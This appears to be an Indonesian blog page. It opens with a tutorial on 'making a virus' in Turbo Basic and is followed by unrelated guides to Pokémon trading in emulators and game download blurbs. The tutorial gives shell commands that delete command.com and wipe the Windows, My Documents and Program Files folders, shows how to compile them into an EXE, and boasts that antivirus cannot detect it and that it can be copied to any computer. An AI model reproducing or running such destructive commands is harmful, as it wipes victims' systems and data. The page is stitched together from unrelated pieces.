Kamis, 03 Februari 2011

Cara Membuat Virus

Cara membuat program perusak (Seperti Virus)

- Download Turbo Basic v1.0
Membuat program perusak (seperti virus) merupakan keinginan sebagian para pemula komputer, tapi bagaimana mereka bisa membuat kalau mereka tidak tahu bahasa pemograman sama sekali, anda jangan resah untuk masalah ini karena saat ini penulis akan mengajarkan anda cara membuat program perusak (virus) yang sangat sederhana sekali tapi sangat mematikan bahkan bisa dikatakan lebih mengerikan dari program perusak manapun.
Pertama kali skill yang anda butuhkan adalah dasar DOS, tanpa ini anda akan sulit untuk berkreasi dalam membuat program ini tapi jika anda tidak tahu dasar perintah DOS maka anda cukup copy paste saja, bahasa pemograman yang akan kita pakai adalah Turbo Basic v1.0, anda dapat mendownloadnya di Google.
Diatas adalah tampilan Turbo Basic, jika anda buta pemograman Turbo Basic maka anda masuk ke Edit lalu anda tulis Source Code program perusak.
shell "Perintah DOS"
dengan diawali kata shell maka anda dapat menjalankan perintah DOS pada program, misal anda membuat :
shell "c:"
shell "cd\"
shell "del command.com"
Diatas adalah contoh menghapus DOS pada DOS Classic, Windows 95/98 sehingga pengguna komputer tidak dapat booting, kita contohkan yang lain.
shell "c:"
shell "cd\"
shell "deltree /y mydocu~1"
shell "deltree /y windows"
shell "deltree /y progra~1"
Diatas adalah contoh menghapus Directory My Document, WIndows dan Program FIles, sangat fatal bukan ?
Setelah anda selesai membuat programnya maka anda save dahulu, caranya pilih File lalu Save lalu beri nama filenya misal VIRUS.BAS, setelah itu baru kita mengcompile source code tadi, caranya pilih Options lalu pilih Compile to EXE file, setelah itu masuk ke pilihan compile lalu anda enter, maka source code tersebut akan menjadi file EXE.
Jika file EXE tersebut dijalankan maka komputer anda akan menjalankan perintah DOS pada program, dari tutorial diatas, anda dapat berkreasi sendiri bagaimana virus buatan anda dapat berjalan sesuai dengan anda inginkan, perlu diketahui bahwa TIDAK ADA SATU ANTIVIRUS DIDUNIA INI DAPAT MENDETEKSI PROGRAM INI ADALAH VIRUS jadi anda bebas mengcopykan program ini ke komputer manapun yang anda suka kecuali komputer berbasis non DOS atau Windows, hehe
Tujuan dari tutorial ini adalah agar kita lebih waspada terhadap berbagai file dengan ekstensi *.exe meskipun file *.exe tersebut 100% dinyatakan bebas virus dari berbagai jenis Antivirus.
Penulis :
Yogya Family Code
*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Download Trading Version VBA

Guide to Pokemon Trading using VBA on PC

This guide attempts to explain how to trade pokemon with yourself in GBA games such as Pokemon Fire Red using Visual Boy Advance on the PC. Anyone who plays pokemon games on emulators knows it is annoying not being able to trade for many reasons, for example a number of pokemon can not evolve without trading and lots of pokemon can not be found in a single game and must be traded from another version (Red/Blue, Gold/Silver etc).

For this guide, you need:
  • A pokemon game rom or two (one is enough)
  • A gpSP or VBA save file with enough progress so that the game allows you to trade
  • This special version of VBA 1.7.2 from vbalink.info
  • These three settings files i prepared:

    .zip  inis.zip (Size: 3.13 KB / Downloads: 50254)
  • Lots of patience

Step One: Preparation

Prepare a new folder somewhere on your computer. I called it gbalink. Extract both the zip files into there. Now, get the rom or roms you want to use. For this guide, I will be using only one: Pokemon Leaf Green. Next, get the save files for your progress. You can get these from the gpSP folder in /PSP/Game/gpSP if you are playing on your PSP, or from somewhere on your computer is you are playing the game in VBA on your PC.

After you put all these files into the gbalink folder, it should look like this:

# 1637 - Pokemon - Leaf Green Version (U).cfg
1637 - Pokemon - Leaf Green Version (U).gba
1637 - Pokemon - Leaf Green Version (U).sav
# Copying
# Copyright.txt
# NEWS
# Readme.txt
# Readme-link.txt
# README-win.txt
vba.ini
vba1.ini
vba2.ini
# VBALink.info.url
VisualBoyAdvance.exe

You can delete the ones with a # in front of them.

Step Two: The save file issues

This version of VBA is edited in such a way that it supports up to 4 instances of the emulator running at once without interfering with each others files. Now, if you were to load the rom into the emulator, you should notice it does not detect the .sav file. That is because it looks for a file with the extension .san instead of .sav, n being the intstance of the emulator (1,2,3 or 4). In this guide, I will trade pokemon with myself from the same save game, but it should work with two different ones.

So: Copy the .sav file, and paste it twice. Rename them: remove the 'Copy of ' part and replace .sav at the end with .sa1, and for the second one replace it with .sa2. In order to do this you must have file extensions enabled in windows, if you don't see .sav or anything go to Tools>Folder Options (in explorer) first, then go to the View tab and untick "Hide extensions for known file types". Click OK to go back to the gbalink folder and rename the copies. So now, you should have:

1637 - Pokemon - Leaf Green Version (U).gba
1637 - Pokemon - Leaf Green Version (U).sa1
1637 - Pokemon - Leaf Green Version (U).sa2
1637 - Pokemon - Leaf Green Version (U).sav
vba.ini
vba1.ini
vba2.ini
VisualBoyAdvance.exe

Now, open one instance of VisualBoyAdvance by double clicking on it. Notice it should be 300% in size because of the vba1.ini file I gave you. Go to File>Open, be sure you are in the gbalink folder not another one, and open the ROM you are using. Boot it, and it should load like normal and display your save game.

If you get the message "The 1M sub-circuit board is not installed", this can have a number of causes:
  1. You selected the wrong ROM. Make sure you opened the one in the gbalink folder, not another one
  2. You did not rename the .sav file to .sa1 properly. If you close the emulator now, it will create one for you which you must delete first.
  3. You are already running an instance or more of VBA. Close all other instances first.
  4. If all of the above doesn't work, go to Options>Emulator>Save Type and select Flash 128k or 64k depending on which one is already ticked. Select the other one. Now close the emulator, reopen it and try again.


Note: The .ini files I gave you in the zip file also contain controls for VBA. The controls for the left instance are WASD, A=Q, B=E, START=X.

Step Three: Trading with yourself

Now that that's working, open up the emulator again if you don't have it open yet. Drag this window to the left side. The controls are as follows:

Up: W
Down: S
Left: A
Right: D
A: Q
B: E
SELECT: Z
START: Q
That's all you'll need.

Boot up your game until you are in the world, and make sure you are in a Pokemon Center. Go up to the trade center, and (in Fire Red/Leaf Green) go to the Direct Corner at the back but don't talk to the lady yet. Make sure that under Options>Emulator "Pause when inactive window" is NOT ticked.

Now, go back to \gbalink and doubleclick on VisualBoyAdvance.exe again. A second screen will open. Drag this window though the right of your screen, so you have two windows next to each other. Go to File>Open, navigate to the \gbalink folder and open the ROM again. The controls for this window are different:

Up: T
Down: G
Left: F
Right: H
A: R
B: Y
SELECT: V
START: B

Load up your saved game until you are in a pokemon center there as well, and go stand in front of the lady. Now, use the [Q]-key to speak to the lady on the LEFT screen. This is where it starts hanging, crashing and becoming slow. If it hangs, do not touch anything and just wait up to 30 seconds for it to restore.

Chose Trade Center, and as soon as it says 'Please Wait...' press the [R]-key to talk to the lady on the RIGHT screen. Go to the trade center and as soon as you see 'Please wait...' on both screens it should proceed to the trade center almost immediately.

If you get a black screen with 'Communication error' around here, just close everything and start over at the beginning of this step.

You are now connected in the trade center, and you should see your pokemons four times if you are using the same save for both emulators. Now just chose the pokemons you want to trade. Remember, you are only going to keep one of these two sets (if you are using the same save for both emulators) so remember which is the good one, left or right. Trade, and when it finished it should say 'Saving...' After that you can pretty much close it off and proceed to step 4.

Step Four: Replacing your save back to your normal emulator

Now, after you have traded all your pokemons patiently, you must take the good save and place it back. You can use either gpSP or VBA again for this.

If you want to keep the save from the left screen, copy xxxx.sa1. if you want to keep the save from the right screen, copy xxxx.sa2. If you want to save both, copy both seperately.

Now, go to the folder where your original .sav file came from. Paste the .sa1/.sa2 file, and copy the old .sav file somewhere safe to BACK IT UP. DO NOT forget this. Now, rename the .sa1/.sa2 file to a .sav file. Make sure it is in the right folder, either the gpSP folder on the PSP or the VBA folder wherever, in the same folder as the rom you use.

Now, load your original emulator and see if it works. If it doesn't detect the save or you get the "The 1M sub-circuit board is not installed" error in VBA, go to the \gbalink folder and copy 'vba.ini'. Place it in your VBA folder, close VBA and start it again and retry. Make sure all the files have the right names.

Done!

In this guide, I used one savegame from Pokemon Leaf Green, and duplicated it in order to copy my own pokemons to myself. This way you can duplicate your pokemon if you want. However, you can also use two different saves or even two different ROMs, and transfer pokemons from one to another. It works the same way except you load two different ROMS and you don't duplicate the .sav file. This method is not tested for, but should work on: Ruby, Sapphire, Fire Red, Emerald and maybe more. Remember, to trade certain pokemons with certain games, you may need to have made a certain amount of progress in the game such as beaten the Elite Four.

Download NDS Emulator

Download NDS Emulator

NO$GBA started as a Gameboy Advance debugger but was later released as a normal emulator(version 1.9). It is the first gameboy advance emulator to support multiplayer games on the same pc! Later versions added support for the NintendoDS portable console.


How to use multiplayer

  • put the GBA BIOS file in the emulator's folder, and rename it to "gba.rom"
  • run No$GBA.exe
  • pick a GBA image (no ZIP)
  • go to "Options" / "Emulation setup"
  • increase the number of "Emulated Gameboys"
  • in "Link Gamepaks", set "Gamepaks in all GBA"
  • in "Reset/Startup Entrypoint", set "GBA BIOS (Nintendo logo")
  • click OK, you should then see 2 GBA screens side by side
  • right click on the left window, click on "Link" so that the window comes back to normal.
  • then redo the right-click and click "Link" , and here we go, the 2nd gameboy does boot!
Please remember that the more gameboy's you emulate the stonger the pc will have to be!

 User Rating 
 Vote 
Rating: 7.7 (23871 Votes)
Rate it:

Download

Download Pokemon


games.gameloft



RARE POKEMON GAMES+1
Nintendo Pokemon
RARE POKEMON GAMES+1 - meboy poke games
Download these rare Meboy games on ur mobile. Pokemon Thunder Yellow u have a 99% chance to catch all 150 Pokemons (except Mew, get him through the Underground Path cheat). In Legendary / Generations versions u start with a Moltres, Zapdos or Articuno. Catch a Mew just outside Pallet Town. In Dbz u play as Vegeta and ur rival is Goku. Piccolo is Prof Oak, start with Charizard, Blastoise or Venusaur. In Rare Crystal start with a L100 Caterpie, and catch all L98 legendary pokemons like Moltres, Zapdos, Articuno, Celebi, Misdreavus or even Mewtwo in grassy areas on route 29 at day or night.
*Pokemon Legends(Gbc):
This version has a new map. Ur journey starts in Celadon City. Pick ur first Pokemon-a Sandshrew, Marill or Magnemite.
*Pokemon Ultimate End(Gbc):
This version has the same map...

Visits: 28739